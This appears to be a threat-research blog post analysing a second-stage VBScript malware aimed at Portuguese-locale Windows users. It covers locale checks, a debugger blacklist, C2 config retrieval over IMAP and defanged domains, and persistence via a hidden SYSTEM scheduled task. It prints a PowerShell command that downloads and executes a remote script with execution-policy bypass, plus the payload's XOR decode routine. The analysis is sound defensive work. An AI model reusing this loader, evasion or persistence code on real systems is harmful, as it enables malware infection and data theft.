WhatApp_PowerShell_VBS-S2

You are here: Home > Uncategorized > Current Article

WhatApp_PowerShell_VBS-S2

By sectorx / October 13, 2025 / Comments Off on WhatApp_PowerShell_VBS-S2

Overview
– Second-stage VBScript is executed in-memory via ExecuteGlobal by a Stage‑0 loader.
– Primary goals: Portuguese locale gating, anti-analysis checks, configuration bootstrap (IMAP → multi-domain /data.php → Pastebin), PowerShell stage launch, optional self-delete.

Locale Targeting (PT-BR/PT-PT)
—————————————————————-
Function CheckSystemLanguage()
‘ OSLanguage 1046 = pt-BR, 2070 = pt-PT
‘ Registry fallback: HKCU\Control Panel\International\sLanguage starts with “PT”
End Function

Anti‑Analysis (Debugger Process Checks)
—————————————————————-
debuggerList = Array(“ollydbg.exe”,”idaq.exe”,”x32dbg.exe”,”x64dbg.exe”,”windbg.exe”,”processhacker.exe”,”procmon.exe”)
For Each p In Win32_Process
If LCase(p.Name) In debuggerList Then Exit (altered flow/exit)
Next

Config Retrieval Order
—————————————————————-
1) IMAP (Terra mailbox)
– Host: imap.terra.com.br:993 (TLS)
– Flow: LOGIN → SELECT INBOX → SEARCH SUBJECT “data” → FETCH BODY[TEXT] → parse server/C2 URLs
2) Fallback domains (HTTP[S]) — all queried with /data.php
– lefthandsuperstructures[.]com
– clhttradinglimited[.]com
– mazdafinancialsevrices[.]com
– ricardasphotography[.]com
– jornalistaaurelianoborgesmidia[.]com
– cursosgratiss[.]com[.]br
– intelligentopennetworkingawards[.]com
– vinhomeshungyentheempires[.]com
– wbdiamonds[.]com
– pastebin[.]com/raw/SmCz4cp8 (secondary config source)
3) If a valid SERVER_URL / POWERSHELL_URL discovered → proceed to PS stage

Public IP Probe
—————————————————————-
– HTTP GET to api.ipify[.]org to record external IP

PowerShell Stage Construction (Excerpt)
—————————————————————-
‘ Build command with TLS12 + DownloadString + IEX to PS endpoint
powershell.exe -ep bypass “[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;iex ((New-Object Net.WebClient).DownloadString(‘https://miportuarios[.]com/sisti/api.ps1’))”

Persistence & Cleanup (Excerpt)
—————————————————————-
– Hide directory: attrib.exe +h +s “C:\ProgramData\WindowsManager\”
– Scheduled Task (OnStart, SYSTEM): “Windows Manager Services” → wscript.exe “C:\ProgramData\WindowsManager\WinManagers.vbs”
– Self‑delete via temp BAT after execution

Stage‑0 → Stage‑2 Decode Pattern (Representative)
—————————————————————-
‘ Stage‑0 emits pipe‑delimited numeric tokens and decodes with XOR‑derived subtractions, then Chr(…):
varX = CInt(token)
varX = (varX – (202 Xor 10)) Mod 256
varX = (varX – (178 Xor 159)) Mod 256
varX = (varX – (38 Xor 250)) Mod 256
varX = (varX – (234 Xor 37 )) Mod 256
decoded_char = Chr(varX)
‘ Decoded buffer ExecuteGlobal → Stage‑2 controller

Published: 4 months ago on October 13, 2025
By: sectorx
Last Modified: October 13, 2025 @ 10:48 pm
Filed Under: Uncategorized

← PREVIOUS ARTICLE
WhatsApp_VBS_PowerShell

About the author

sectorx

View all articles by sectorx »

Malwarebytes
- Match, Hinge, OkCupid, and Panera Bread breached by ransomware group January 30, 2026
  ShinyHunters claims to have stolen millions of records from Match Group dating apps and Panera Bread, with very different consequences for users.
- TikTok’s privacy update mentions immigration status. Here’s why. January 30, 2026
  TikTok updated its privacy policy to mention immigration status, sparking backlash—but the reality is more complicated.
- Meta confirms it’s working on premium subscription for its apps January 29, 2026
  Details are currently thin, but one thing is clear: paying more is unlikely to buy users meaningful privacy or less tracking.

ThreatPost
- Student Loan Breach Exposes 2.5M Records August 31, 2022
  2.5 million people were affected, in a breach that could spell more trouble down the line.
- Watering Hole Attacks Push ScanBox Keylogger August 30, 2022
  Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.
- Tentacles of ‘0ktapus’ Threat Group Victimize 130 Firms August 29, 2022
  Over 130 companies tangled in sprawling phishing campaign that spoofed a multi-factor authentication system.
- Ransomware Attacks are on the Rise August 26, 2022
  Lockbit is by far this summer’s most prolific ransomware group, trailed by two offshoots of the Conti group.
- Cybercriminals Are Selling Access to Chinese Surveillance Cameras August 25, 2022
  Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE, leaving thousands of organizations exposed.

Think Outside of The Box or We Can Build a Better One